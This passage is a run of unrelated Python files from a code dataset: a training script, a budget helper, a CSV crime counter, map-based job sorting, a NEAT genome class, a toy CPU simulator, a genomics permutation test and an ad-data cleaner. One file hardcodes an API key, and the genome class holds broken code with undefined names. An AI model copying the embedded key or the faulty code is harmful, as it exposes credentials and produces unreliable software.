CFG[\"hyperparameter\"][\"hor_fov_deg\"]\n optimizer_name = CFG[\"hyperparameter\"][\"optimizer_name\"]\n lr_cnn = float(CFG[\"hyperparameter\"][\"lr_cnn\"])\n lr_fc = float(CFG[\"hyperparameter\"][\"lr_fc\"])\n batch_size = CFG[\"hyperparameter\"][\"batch_size\"]\n num_epochs = CFG[\"hyperparameter\"][\"num_epochs\"]\n\n try:\n print(\"Copy files to %s for further reference.\" % log_path)\n copyfile(FLAGS.train_cfg, log_path + \"/train_config.yaml\")\n except Exception as e:\n print(e)\n print(\"Error copying files, check permissions. Exiting....\")\n quit()\n\n ##Get train and valid dataset\n train_dataset = dataset_mod.Originaldataset(\n data_list = make_datalist_mod.makeMultiDataList(list_train_rootpaths, csv_name),\n transform = data_transform_mod.DataTransform(\n resize,\n ([mean_element, mean_element, mean_element]),\n ([std_element, std_element, std_element]),\n hor_fov_deg = hor_fov_deg\n ),\n phase = \"train\"\n )\n\n valid_dataset = dataset_mod.Originaldataset(\n data_list = make_datalist_mod.makeMultiDataList(list_valid_rootpaths, csv_name),\n transform = data_transform_mod.DataTransform(\n resize,\n ([mean_element, mean_element, mean_element]),\n ([std_element, std_element, std_element]),\n hor_fov_deg = hor_fov_deg\n ),\n phase = \"valid\"\n )\n\n ##Network\n net = dnn_network.Network(resize, dim_fc_out=3, dropout_rate=0.1, use_pretrained_vgg=True)\n\n\n ##Criterion\n criterion = nn.MSELoss()\n\n #train\n trainer = trainer_mod.Trainer(\n method_name,\n train_dataset,\n valid_dataset,\n net,\n criterion,\n optimizer_name,\n lr_cnn,\n lr_fc,\n batch_size,\n num_epochs,\n weights_path,\n log_path,\n graph_path\n )\n\n trainer.train()\n","sub_path":"pysrc/regression/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"375603933","text":"import datetime\nimport re\n\nfrom .exceptions import ObjectIsNotADate\n\n\ndef format_date(value, format=\"%d %M %Y\"):\n regex = re.match(r\"(?P\\d{4})-(?P\\d{2})-(?P\\d{2})\", value)\n if regex is not None:\n date = datetime.date(\n int(regex.group(\"year\")),\n int(regex.group(\"month\")),\n int(regex.group(\"day\")))\n else:\n raise ObjectIsNotADate\n\n return date.strftime(format)\n","sub_path":"jsonresume_theme_stackoverflow/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"387480936","text":"#!/usr/bin/env python3\n# -*-encoding: utf-8-*-\n\n# Список полів з таблиці REVENUE, які будуть відображатись у GUI\nREVENUE_FIELDS = ('id', 'Date', 'Sum', 'Category', 'Comments')\n\n# Список полів з таблиці COST, які будуть відображатись у GUI\nCOSTS_FIELDS = ('id', 'Date', 'Sum', 'Category', 'Comments')\n\n# К-ть елементів за умовчанням, які буде видавати пошук\nDEFAULT_N = 40\n\n# Константа, що означає тип транзакції 'Дохід'. Збігається з назвою таблиці з доходами\nREVENUE = 'Revenues'\n\n# Константа, що означає тип транзакції 'Витрата'. Збігається з назвою таблиці з витратами\nCOST = 'Costs'\n\n# шлях за умовчанням до бази даних\nDEFAULT_DATABASE = './budget.db'\n\n\ndef name_dict(dicts_list) -> dict:\n \"\"\" Функція, яка з списку словників (дані з бази даних) формує\n словник {Name: id}\n\n :param dicts_list: [dict('field1': 'val1' ... ), dict('field1': 'val1' ... )]\n :return: dict(Name1: id1, Name2: id2)\n \"\"\"\n res = {}\n for el in dicts_list:\n res[el['Name']] = el['id']\n return res\n\n\ndef id_dict(dicts_list):\n \"\"\" Функція, яка з списку словників (дані з бази даних) формує\n словник {id: Name}\n\n :param dicts_list: [dict('field1': 'val1' ... ), dict('field1': 'val1' ... )]\n :return: dict(id1: Name1, id2: Name2)\n \"\"\"\n res = {}\n for el in dicts_list:\n res[el['id']] = el['Name']\n return res\n","sub_path":"math_projects/dana_sira/structure/other_functions.py","file_name":"other_functions.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"158147908","text":"'''\nВам дана частичная выборка из датасета зафиксированных преступлений, совершенных в городе Чикаго\nс 2001 года по настоящее время.\nОдним из атрибутов преступления является его тип – Primary Type.\nВам необходимо узнать тип преступления, которое было зафиксировано максимальное \nчисло раз в 2015 году.\nФайл с данными:\nCrimes.csv\n'''\n\nimport csv\nimport re\nfrom collections import Counter\n\nPrimary_Type = []\n\n# через регулярку\nwith open(r'A:\\Crimes.csv') as r:\n reader = csv.reader(r)\n for row in reader:\n result = re.findall(r'\\d{2}\\/\\d{2}\\/2015', str(row))\n if result:\n Primary_Type.append(row[5])\n\n# #через поиск в элементе списка\n# with open(r'A:\\Crimes.csv') as r:\n# reader = csv.reader(r)\n# for row in reader:\n# if '2015' in row[2]:\n# Primary_Type.append(row[5])\n\nprint(Counter(Primary_Type).most_common(1))\n","sub_path":"Python основы и применение/csv(поиск количества преступлений).py","file_name":"csv(поиск количества преступлений).py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"67381013","text":"import requests\nfrom data import db_session\nfrom data.jobs import Jobs\n\n\ndef show():\n db_session.global_init(\"db/jobs.db\")\n session = db_session.create_session()\n points = session.query(Jobs.coords, Jobs.id, Jobs.is_finished).all()\n ids = [el[1] for el in points if el[2] == False]\n points = [el[0] for el in points if el[2] == False]\n points = [f'{points[i].split()[0]},{points[i].split()[1]},pm2ywl{ids[i]}' for i in range(len(points))]\n map_request = f\"http://static-maps.yandex.ru/1.x/?&l=map&pt={'~'.join(points)}\"\n response = requests.get(map_request)\n map_file = 'static/img/map.png'\n if response:\n with open(map_file, \"wb\") as file:\n file.write(response.content)\n return map_file\n\n\ndef sort_address_jobs(address):\n try:\n db_session.global_init(\"db/jobs.db\")\n session = db_session.create_session()\n jobs = session.query(Jobs).all()\n\n geocoder_api_server = \"http://geocode-maps.yandex.ru/1.x/\"\n geocoder_params = {\n \"apikey\": \"40d1649f-0493-4b70-98ba-98533de7710b\",\n \"geocode\": address,\n \"format\": \"json\"}\n response = requests.get(geocoder_api_server, params=geocoder_params)\n if response:\n json_response = response.json()\n toponym = json_response[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"]\n coodrinates = toponym[\"Point\"][\"pos\"]\n\n sp = [(job, ((float(job.coords.split()[0]) - float(coodrinates.split()[0])) ** 2 + (\n float(job.coords.split()[1]) - float(coodrinates.split()[1])) ** 2) ** 0.5) for job in jobs]\n return [el[0] for el in sorted(sp, key=lambda x: x[1])]\n except:\n return None\n\n\ndef sort_salary_jobs(position):\n try:\n db_session.global_init(\"db/jobs.db\")\n session = db_session.create_session()\n jobs = session.query(Jobs).all()\n sp = [(job, job.salary) for job in jobs]\n if position == 'up':\n return [el[0] for el in sorted(sp, key=lambda x: x[1])]\n return [el[0] for el in sorted(sp, key=lambda x: x[1])][::-1]\n except:\n return None\n\n\ndef sort_date_jobs(position):\n try:\n db_session.global_init(\"db/jobs.db\")\n session = db_session.create_session()\n jobs = session.query(Jobs).all()\n sp = [(job, job.id) for job in jobs]\n if position == 'up':\n return [el[0] for el in sorted(sp, key=lambda x: x[1])]\n return [el[0] for el in sorted(sp, key=lambda x: x[1])][::-1]\n except:\n return None\n","sub_path":"data/show_map.py","file_name":"show_map.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"82153220","text":"import math\nfrom NeuralNetwork import *\n\nclass Genome:\n def __init__(self):\n\n #contains connectionGene\n self.genes = []\n #contains Node\n self.nodes = []\n\n #(int)quantity of both\n self.inputs = 3\n self.outputs = 3\n \n #(int)\n self.layers = 2\n self.nextNode = 0\n\n #contains Nodes\n self.network = []\n\n #Create input nodes\n #might be wrong\n for i in range(self.inputs):\n self.nodes.append(Node(i))\n self.nextNode += 1\n self.nodes[i].layer = 0\n \n #Create output nodes\n for i in range(self.outputs):\n self.nodes.append(Node(i + self.inputs))\n self.nodes[i].layer = 1\n self.nextNode += 1;\n\n #initialize the bias node once established\n self.nodes.append(Node(self.nextNode))\n self.biasNode = self.nextNode\n self.nextNode += 1\n self.nodes[self.biasNode].layer = 0\n \n def getNode(self, nodeNumber):\n for node in self.nodes:\n if node.number == nodeNumber:\n return node\n return null\n \n def connectNodes(self):\n \"\"\"adds the conenctions going out of a node to that node so that it can acess the next node during feeding forward \"\"\"\n #clear all of the nodes\n for node in self.nodes:\n #unsure if clear will work\n node.outputConnections.clear()\n \n for gene in self.genes:\n gene.fromNode.outputConnections.append(gene)\n \n def feedForward(self, inputValues):\n \"\"\"feeding in input values into the NN and returning output array\"\"\"\n for i in range(self.inputs):\n self.nodes[i].outputValue = inputValues[i]\n self.nodes[self.biasNode].outputValue = 1\n\n for node in self.network:\n node.engage()\n \n outs = []\n # for output in self.outputs:\n #make sure (int)output is giving the correct sequential output\n #outs[output] = (float)self.nodes[self.inputs + output].outputValue #<- This line is wronk\n \n for node in self.nodes:\n node.inputSum = 0\n return outs\n \n def generateNetwork(self):\n \"\"\" sets up the NN as a list of nodes in order to be engaged \"\"\"\n self.connectNodes()\n network = []\n for lay in range(self.layers):\n for node in self.nodes:\n if node.layer == lay:\n network.append(node)\n\n def addNode(self, innovationHistory):\n if self.genes.size() == 0:\n addConnection(innovationHistory)\n return\n randomConnection = math.floor(random(len(self.genes)))\n\n while self.genes.get(randomConnection).fromNode == nodes.get(biasNode) and self.genes.size() > 1:\n randomConnection = math.floor(random(len(self.genes)))\n\n self.genes.get(randomConnection).enabled = false\n\n newNodeNo = nextNode\n nodes.add(newNodeNo)\n nextNode = nextNode + 1\n\n connectionInnovationNumber = getInnovationNumber(innovationHistory, self.genes.get(randomConnection).fromNode, getNode(newNodeNo))\n #add a new connection from the new node with a weight the same as the disabled connection\n self.genes.add(connectionGene(getNode(newNodeNo), self.genes.get(randomConnection).toNode, genes.get(randomConnection).weight, connectionInnovationNumber))\n getNode(newNodeNo).layer = self.genes.get(randomConnection).fromNode.layer + 1\n\n connectionInnovationNumber = getInnovationNumber(innovationHistory, nodes.get(biasNode), getNode(newNodeNo))\n #Connect the bias to the new node with a weight of 0\n self.genes.add(connectionGene(self.nodes.get(biasNode), getNode(newNodeNo), 0, connectionInnovationNumber))\n\n #If the layer of the new node is equal to the layer of the output node of the old connection then a new layer needs to be created\n #more accurately the layer numbers of all layers equal to or greater than this new node need to be incrimented\n if (getNode(newNodeNo).layer == self.genes.get(randomConnection).toNode.layer):\n for i in self.nodes: #dont include this newest node\n if (i.layer >= getNode(newNodeNo).layer):\n i.layer = i.layer + 1;\n layers = layers + 1;\n connectNodes();\n\n def mutate(self, innovationHistory):\n if self.genes.size() == 0:\n addConnection(innovationHistory)\n randomNum1 = randrange(1, 10)\n randomNum1 = 1.0/randomNum\n if randomNum1 < 0.8:\n for i in self.genes:\n i.mutateWeight()\n\n randomNum2 = randrange(1,10)\n randomNum2 = 0.5/randomNum2\n if randomNum2 < 0.05:\n addConnection(innovationHistory)\n\n randomNum3 = randrange(1,10)\n randomNum3 = 0.1/randomNum3\n if randomNum3 < 0.01:\n addNode(innovationHistory)\n","sub_path":"Project/Rebecca/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"586929292","text":"import matplotlib.pyplot as plt\r\n\r\nimport numpy as np\r\nX=[]\r\nY=[]\r\ndef plot( x_dim, y_dim):\r\n '''\r\n x_dim and y_dim should be such that both the figures are visible inside the plot\r\n '''\r\n x_dim, y_dim = 1.2 * x_dim, 1.2 * y_dim\r\n plt.plot((0, x_dim), [0, 0], 'k-')\r\n plt.plot([0, 0], (0, y_dim), 'k-')\r\n plt.xlim(0, x_dim)\r\n plt.ylim(0, y_dim)\r\n plt.xlabel(\"Cycle number\")\r\n plt.ylabel(\"Accessed memory address\")\r\n plt.grid()\r\n sams=\"CO\"+str(len(X))+\".png\"\r\n plt.savefig(sams)\r\n plt.show()\r\ndef Pd():\r\n plt.scatter(X,Y,c=\"blue\")\r\n plot(max(X),max(Y))\r\n\r\ndef convert1(a):\r\n # convert integer to 16 bit binary\r\n bnr = bin(a).replace('0b', '')\r\n x = bnr[::-1] # this reverses an array\r\n while len(x) < 16:\r\n x += '0'\r\n bnr = x[::-1]\r\n return bnr\r\n\r\n\r\ndef convert(a):\r\n # convert integer to 8 bit binary\r\n bnr = bin(a).replace('0b', '')\r\n x = bnr[::-1] # this reverses an array\r\n while len(x) < 8:\r\n x += '0'\r\n bnr = x[::-1]\r\n return bnr\r\nstatements = {}\r\nvar = 0\r\npc =\"00000000\"\r\nreg = {'000': \"0000000000000000\",\r\n '001': \"0000000000000000\",\r\n '010': \"0000000000000000\",\r\n '011': \"0000000000000000\",\r\n '100': \"0000000000000000\",\r\n '101': \"0000000000000000\",\r\n '110': \"0000000000000000\",\r\n '111': \"0000000000000000\"}\r\nwhile (1):\r\n try:\r\n line = input()\r\n if(line!=\"\"):\r\n statements[convert(var)] = line\r\n var += 1\r\n except EOFError:\r\n break\r\nMEM = statements.copy()\r\nmlen = len(MEM)\r\nwhile (mlen <= 255):\r\n MEM[convert(mlen)] = \"0000000000000000\"\r\n mlen+=1\r\ndef mov1(l,pc):\r\n reg[\"111\"]=\"0000000000000000\"\r\n reg[l[5:8]]=convert1(int(l[8:], 2))\r\n return convert(int(pc,2)+1)\r\n\r\n\r\ndef mov2(l,pc):\r\n reg[l[10:13]]=convert1(int(reg[l[13:]],2))\r\n reg[\"111\"]=\"0000000000000000\"\r\n return convert(int(pc,2)+1)\r\n\r\n\r\ndef add(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n n1 = int(reg[l[10:13]], 2)\r\n n2 = int(reg[l[13:16]], 2)\r\n x = (n1 + n2)\r\n y = bin(x)\r\n if len(y) > 18:\r\n reg[l[7:10]] = y[-16:]\r\n reg['111'] = convert1(int(reg['111'], 2) + 8)\r\n else:\r\n reg[l[7:10]] = convert1(x)\r\n return convert(int(pc, 2) + 1)\r\n\r\ndef sub(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n n1 = int(reg[l[10:13]], 2)\r\n n2 = int(reg[l[13:16]], 2)\r\n x = (n1 - n2)\r\n if x < 0:\r\n reg[l[7:10]] =\"0000000000000000\"\r\n reg['111'] = convert1(int(reg['111'], 2) + 8)\r\n else:\r\n reg[l[7:10]] = convert1(x)\r\n return convert(int(pc,2)+1)\r\n\r\ndef mul(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n n1 = int(reg[l[10:13]], 2)\r\n n2 = int(reg[l[13:16]], 2)\r\n x = (n1 * n2)\r\n y = bin(x)\r\n if len(y) > 18:\r\n reg[l[7:10]]=y[-16:]\r\n reg['111'] = convert1(int(reg['111'], 2) + 8)\r\n\r\n else:\r\n reg[l[7:10]] = convert1(x)\r\n return convert(int(pc,2)+1)\r\n\r\ndef div(l,pc):\r\n reg[\"111\"]=\"0000000000000000\"\r\n n1 = int(reg[l[10:13]], 2)\r\n n2 = int(reg[l[13:16]], 2)\r\n x = (n1 // n2)\r\n y = n1 % n2\r\n x = convert1(x)\r\n y = convert1(y)\r\n reg[\"R0\"]=x\r\n reg[\"R1\"]=y\r\n return convert(int(pc,2)+1)\r\n\r\ndef left_shift(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n x = int(reg[l[5:8]], 2) << int(l[8:], 2)\r\n x = convert1(x)\r\n if (len(x) > 16):\r\n reg['111'] = (bin(int(reg['111'], 2) + 8))[2:]\r\n else:\r\n reg[l[5:8]] = x\r\n return convert(int(pc,2)+1)\r\n\r\ndef right_shift(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n x = int(reg[l[5:8]], 2) >> int(l[8:], 2)\r\n x = convert1(x)\r\n reg[l[5:8]] = x\r\n return convert(int(pc,2)+1)\r\n\r\ndef xor_fnc(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[7:10]] = convert1(int(reg[l[10:13]], 2) ^ int(reg[l[13:]], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef or_fnc(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[7:10]] = convert1(int(reg[l[10:13]], 2) | int(reg[l[13:]], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef and_fnc(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[7:10]] = convert1(int(reg[l[10:13]], 2) & int(reg[l[13:]], 2))\r\n\r\n return convert(int(pc,2)+1)\r\ndef not_fnc(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[10:13]] = convert1(~int(reg[l[13:]], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef load(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n reg[l[5:8]] = MEM[l[8:]]\r\n X.append(X[-1])\r\n Y.append(int(l[8:], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef store(l,pc):\r\n reg[\"111\"] = \"0000000000000000\"\r\n MEM[l[8:]] = reg[l[5:8]]\r\n X.append(X[-1])\r\n Y.append(int(l[8:], 2))\r\n return convert(int(pc,2)+1)\r\n\r\ndef compare(l,pc):\r\n\r\n reg['111'] = '0000000000000000'\r\n if int(reg[l[10:13]], 2) == int(reg[l[13:]], 2):\r\n reg['111'] = convert1(int(reg['111'], 2) + 1)\r\n elif int(reg[l[10:13]], 2) > int(reg[l[13:]], 2):\r\n reg['111'] = convert1(int(reg['111'], 2) + 2)\r\n elif int(reg[l[10:13]], 2) < int(reg[l[13:]], 2):\r\n reg['111'] = convert1(int(reg['111'], 2) + 4)\r\n return convert(int(pc,2)+1)\r\n\r\ndef jump_uncond(l,pc):\r\n return l[8:]\r\ndef jump_if_less(l,pc):\r\n if (reg['111'][-3] == '1'):\r\n return l[8:]\r\n else:\r\n return convert(int(pc, 2) + 1)\r\n\r\n\r\ndef jump_if_greater(l,pc):\r\n if (reg['111'][-2] == '1'):\r\n return l[8:]\r\n return convert(int(pc, 2) + 1)\r\n\r\n\r\ndef jump_if_equal(l,pc):\r\n if (reg['111'][-1] == '1'):\r\n return l[8:]\r\n return convert(int(pc, 2) + 1)\r\n\r\n\r\ndef halt(pc):\r\n RF_dump()\r\n print()\r\n return pc\r\n\r\ndef PC_dump(pc):\r\n print(pc,end=\" \")\r\n\r\n\r\ndef MEM_DUMP():\r\n for i in MEM.keys():\r\n print(MEM[i])\r\n\r\n\r\ndef RF_dump():\r\n for i in reg.keys():\r\n print(reg[i],end=\" \")\r\n print()\r\n\r\ndef M(pc):\r\n c=0\r\n while(1):\r\n X.append(c)\r\n Y.append(int(pc, 2))\r\n c=c+1\r\n PC_dump(pc)\r\n if(pc==convert(len(statements)-1)):\r\n RF_dump()\r\n break\r\n if (statements[pc][0:5] == \"00000\"):\r\n pc=add(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00001\"):\r\n pc=sub(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00010\"):\r\n pc=mov1(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00011\"):\r\n pc=mov2(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00100\"):\r\n pc=load(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00101\"):\r\n pc=store(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00110\"):\r\n pc=mul(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00111\"):\r\n pc=div(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01000\"):\r\n pc=right_shift(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01001\"):\r\n pc=left_shift(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01010\"):\r\n pc=xor_fnc(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01011\"):\r\n pc=or_fnc(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01100\"):\r\n pc=and_fnc(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01101\"):\r\n pc=not_fnc(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01110\"):\r\n pc=compare(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01111\"):\r\n pc=jump_uncond(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"10000\"):\r\n pc=jump_if_less(statements[pc],pc)\r\n reg[\"111\"] = \"0000000000000000\"\r\n elif (statements[pc][0:5] == \"10001\"):\r\n pc=jump_if_greater(statements[pc],pc)\r\n reg[\"111\"] = \"0000000000000000\"\r\n elif (statements[pc][0:5] == \"10010\"):\r\n pc=jump_if_equal(statements[pc],pc)\r\n reg[\"111\"] = \"0000000000000000\"\r\n elif (statements[pc][0:5] == \"10011\"):\r\n pc=halt(pc)\r\n RF_dump()\r\n break\r\n RF_dump()\r\n MEM_DUMP()\r\nM(pc)\r\nPd()\r\n","sub_path":"CO_M21_Assignment-main/SimpleSimulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"517486902","text":"#NOTE: some code is duplicated from get_peak_distribution_in_tads.py;\n#Best to remove this duplication in the future\n\nimport argparse\nimport random\n\ndef parse_args():\n parser=argparse.ArgumentParser(description=\"Perform a sampling test to check if any TAD's are enriched\")\n parser.add_argument(\"--peaks\")\n parser.add_argument(\"--num_to_sample\",type=int)\n parser.add_argument(\"--tads\")\n parser.add_argument(\"--outf\")\n parser.add_argument(\"--binsize\",type=int,default=5000)\n parser.add_argument(\"--num_samples\",type=int,default=10000)\n return parser.parse_args()\n\ndef main():\n args=parse_args()\n tads=open(args.tads,'r').read().strip().split('\\n')\n peaks=open(args.peaks,'r').read().strip().split('\\n')\n binsize=args.binsize\n num_to_sample=args.num_to_sample\n num_samples=args.num_samples\n \n tad_dict=dict()\n tad_distribution=dict()\n for tad in tads:\n tokens=tad.split('\\t')\n chrom=tokens[0]\n startval=int(tokens[1])\n endval=int(tokens[2])\n if chrom not in tad_dict:\n tad_dict[chrom]=dict()\n tad_distribution[chrom]=dict() \n tad_dict[chrom][startval]=endval\n tad_distribution[chrom][startval]=[0]*num_samples \n print(\"generated tad dictionary\")\n\n cur_sample=0\n num_peaks=len(peaks)\n print(str(num_peaks))\n print(str(num_to_sample))\n while cur_sample < num_samples:\n #sample randomly from the peak set\n subset_indices=random.sample(range(num_peaks),num_to_sample)\n peak_subset=[peaks[i] for i in subset_indices]\n for peak in peak_subset:\n tokens=peak.split('\\t')\n chrom=tokens[0]\n if chrom not in tad_dict:\n continue\n startval=int(tokens[1])\n endval=int(tokens[2])\n if chrom in tad_dict:\n for tad_start in tad_dict[chrom]:\n if tad_start <= startval:\n tad_end=tad_dict[chrom][tad_start]\n if tad_end >= endval:\n #we have a hit!\n tad_distribution[chrom][tad_start][cur_sample]+=1\n cur_sample+=1\n print(str(cur_sample))\n\n outf=open(args.outf,'w')\n outf_mean=open(args.outf+'.mean','w')\n for chrom in tad_distribution:\n for startval in tad_distribution[chrom]:\n outf.write(chrom+'\\t'+str(startval)+'\\t'+str(tad_dict[chrom][startval])+'\\t'+'\\t'.join([str(i) for i in tad_distribution[chrom][startval]])+'\\n')\n #get the mean value for each tad\n outf_mean.write(chrom+'\\t'+str(startval)+'\\t'+str(tad_dict[chrom][startval])+'\\t'+str(sum(tad_distribution[chrom][startval])*1.0/num_samples)+'\\n')\n \nif __name__==\"__main__\":\n main()\n","sub_path":"check_tad_enrichment/perform_permutation_test.py","file_name":"perform_permutation_test.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"632810231","text":"# 将广告campaign历史数据导入 ad_campaigns 表格中\r\n\r\nfrom pandas import DataFrame, Series\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom dateutil.parser import parse\r\nimport psycopg2\r\nimport re, sys, time\r\n\r\n####################################################\r\n########## 市场广告投放的campaign历史数据 #############\r\n####################################################\r\n\r\ndf_ad = pd.read_csv(r'C:\\Users\\luyaxin\\Desktop\\工作文件夹\\广告campaign历史数据\\ai_public_ads.csv',\r\n names=['id', 'campaign_id', 'campaign_name', 'adset_id', 'adset_name',\r\n 'adset_optimization_goal', 'adset_bid_amount', 'adset_billing_event',\r\n 'adset_daily_budget', 'adset_promoted_object_url', 'adset_promoted_object_id',\r\n 'adset_targeting_flexible_spec_id', 'adset_targeting_user_device',\r\n 'adset_targeting_publisher_platforms', 'adset_targeting_geo_locations_countries',\r\n 'adset_targeting_geo_locations_types', 'adset_targeting_age_max',\r\n 'adset_targeting_age_min', 'adset_targeting_excluded_custom_audiences',\r\n 'adset_targeting_custom_audiences', 'adset_targeting_app_install_state',\r\n 'adset_targeting_excluded_connections', 'adset_targeting_device_platform',\r\n 'adset_targeting_user_os', 'adset_targeting_facebook_positions',\r\n 'adset_targeting_genders', 'ad_id', 'ad_name', 'ad_creative_id',\r\n 'created_by', 'status'])\r\n\r\ndf_ad.adset_targeting_genders.value_counts() # 性别分布\r\ndf_ad.adset_targeting_genders.isnull().value_counts() # 性别为Null的数量\r\n\r\ndf_ad.adset_targeting_geo_locations_countries.value_counts() # 目标国家分布\r\ndf_ad.adset_targeting_geo_locations_countries.isnull().value_counts() # 目标国家字段有未解析出的情况\r\ndf_ad.adset_targeting_publisher_platforms.value_counts()\r\n\r\ndf_ad.adset_targeting_device_platform.value_counts() \r\ndf_ad.adset_targeting_facebook_positions.value_counts()\r\ndf_ad.adset_targeting_user_os.value_counts() \r\n\r\n\r\n##################################################\r\n################ 清洗数据 #########################\r\n##################################################\r\n\r\n# 从campaign_name中解析出广告投放的日期\r\ndef parse_campaign_date(campaign_str):\r\n \"\"\"\r\n 从'campagin_name'字段解析出广告投放的起始日期,并统一格式\r\n 日期形如 20150803, 2015-09-29, 2016-0623, 2015-4-24, 7/11, 7/3\r\n \"\"\"\r\n mobj = re.search(re.compile(\"((2014|2015|2016)(\\d|-|\\/)+(\\d|-|\\/)[0-3]+\\d)|(\\s*\\d{1,2}\\/\\d{1,2}\\s*)\"), campaign_str)\r\n try:\r\n date_str = mobj.group().strip()\r\n if (len(date_str) <= 5) and ('/' in date_str):\r\n date_str = '2015/' + date_str\r\n \r\n elif date_str.count('-') == 1: # 处理形如'2015-0623'的日期格式\r\n day_str = date_str[-2:]\r\n date_str = date_str.replace(day_str, '-' + day_str) # str.replace不是inplace\r\n \r\n date_obj = parse(date_str)\r\n return date_obj.strftime('%Y-%m-%d')\r\n \r\n except:\r\n return 'Not Specified'\r\n\r\ndf_ad['md_campaign_date'] = df_ad['campaign_name'].apply(parse_campaign_date)\r\n#df_ad['md_campagin_date'].isnull().value_counts()\r\n\r\n# 从ad_name中解析出单个广告元素\r\ndef parse_ad_content_elements(ad_elements_str):\r\n \"\"\"\r\n 从包含广告元素的字符串'ad_name'中解析出单个广告元素 (两种加号:+, +)\r\n \"\"\"\r\n ad_elements_str = re.sub(re.compile(\"((2014|2015|2016)(\\d|-|\\/)+(\\d|-|\\/)[0-3]+\\d)|(\\s*\\d{1,2}\\/\\d{1,2}\\s*)\"), '', ad_elements_str).strip()\r\n ad_elements_str = re.sub(re.compile(\"\\+|\\+|_|-|\\s|\\.\"), '', ad_elements_str)\r\n ad_elements_list = ad_elements_str.split('')\r\n for ad_element in ad_elements_list:\r\n if not ad_element:\r\n ad_elements_list.remove(ad_element)\r\n return str(ad_elements_list).replace(\"'\", \"\")[1: -1] # 去除单引号和中括号\r\n\r\ndf_ad['md_ad_elements'] = df_ad['ad_name'].apply(parse_ad_content_elements)\r\n#DataFrame(df_ad.ix[:, ['ad_name', 'ad_elements']]).to_excel(r'C:\\Users\\m7catsue\\Desktop\\ad_elements.xls')\r\n\r\n# 从campaign_name中填补目标性别,重新标记目标性别选项为male, female, all\r\n#df_ad.adset_targeting_genders.value_counts()\r\n#df_ad.adset_targeting_genders.isnull().value_counts()\r\n\r\ndef parse_targeting_genders(row):\r\n \"\"\"\r\n Row function: 重新标记广告目标性别,并填补性别的缺失值\r\n \"\"\"\r\n if row['adset_targeting_genders'] == '[1]': \r\n return 'male'\r\n if row['adset_targeting_genders'] == '[2]': \r\n return 'female'\r\n else:\r\n mobj = re.search(re.compile(\"\\s(M|F)\\s\"), row['adset_name'])\r\n try:\r\n gender = mobj.group().strip()\r\n if gender == 'M': return 'male'\r\n if gender == 'F': return 'female'\r\n except AttributeError:\r\n return 'all'\r\n \r\ndf_ad['md_targeting_genders'] = df_ad.apply(parse_targeting_genders, axis=1) # 对df的每一行apply函数\r\n#df_ad['md_targeting_genders'].value_counts()\r\n\r\n\r\n# 填补缺失的国家代码\r\ndef parse_targeting_countries(row):\r\n \"\"\"\r\n Row function:填补国家代码的缺失值,在新一列重新标记\r\n \"\"\"\r\n if not row['adset_targeting_geo_locations_countries'] is np.nan:\r\n return row['adset_targeting_geo_locations_countries']\r\n else:\r\n mobj = re.match(\"([A-Z]{2}\\s)|(([A-Z]{2}\\+)+[A-Z]{2}\\s)\", row['adset_name'])\r\n try:\r\n country_code = mobj.group().strip()\r\n return country_code\r\n except AttributeError:\r\n if ('伊斯坦布尔' in row['adset_name']) or ('安卡拉' in row['adset_name']):\r\n return 'TR'\r\n if '加州' in row['adset_name']:\r\n return 'US'\r\n else:\r\n return 'ROW'\r\n \r\ndf_ad['md_targeting_countries'] = df_ad.apply(parse_targeting_countries, 